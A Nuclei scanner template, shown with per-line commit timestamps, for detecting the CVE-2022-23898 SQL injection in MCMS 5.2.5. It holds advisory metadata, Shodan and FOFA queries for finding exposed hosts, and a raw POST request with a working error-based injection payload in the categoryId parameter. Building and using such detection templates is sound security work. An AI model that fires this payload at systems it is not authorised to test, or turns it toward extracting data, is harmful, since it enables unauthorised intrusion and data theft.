2023-03-30 17:06:37 +00:00
id : CVE-2022-23898
info :
2023-04-13 15:39:52 +00:00
name : MCMS 5.2.5 - SQL Injection
2023-03-30 17:06:37 +00:00
author : Co5mos
2023-03-31 16:11:22 +00:00
severity : critical
2023-03-30 17:06:37 +00:00
description : |
2023-04-13 15:39:52 +00:00
MCMS 5.2.5 contains a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
2023-09-06 11:59:08 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.5.
2023-03-30 17:06:37 +00:00
reference :
2023-03-31 11:54:00 +00:00
- https://github.com/ming-soft/MCMS/issues/62
2023-03-30 17:06:37 +00:00
- https://github.com/advisories/GHSA-p94q-9q2m-pfh2
- https://nvd.nist.gov/vuln/detail/CVE-2022-23898
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-23898
cwe-id : CWE-89
2024-03-23 09:28:19 +00:00
epss-score : 0.0161
epss-percentile : 0.87161
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:*
2023-03-30 17:06:37 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : mingsoft
product : mcms
2023-09-06 11:59:08 +00:00
shodan-query : http.favicon.hash:1464851260
fofa-query : icon_hash="1464851260"
2023-12-05 09:50:33 +00:00
tags : cve,cve2022,sqli,mcms,mingsoft
2023-03-30 17:06:37 +00:00
variables :
num : "999999999"
2023-04-27 04:28:59 +00:00
http :
2023-03-30 17:06:37 +00:00
- raw :
- |
POST /cms/content/list HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
categoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz
matchers :
- type : word
part : body
words :
2023-03-30 17:21:31 +00:00
- 'c8c605999f3d8352d7bb792cf3fdb25'
2024-03-25 11:57:16 +00:00
# digest: 4b0a00483046022100bc573519d97c7e33cb54d6edce45a40fcdb95812ec7800e929a9205d5685fc690221008936ca5aa6d12794cfd449ed310894bcd2cc70e038d631c3e29d6f0157b4b92e:922c64590222798bb761d5b6d8e72950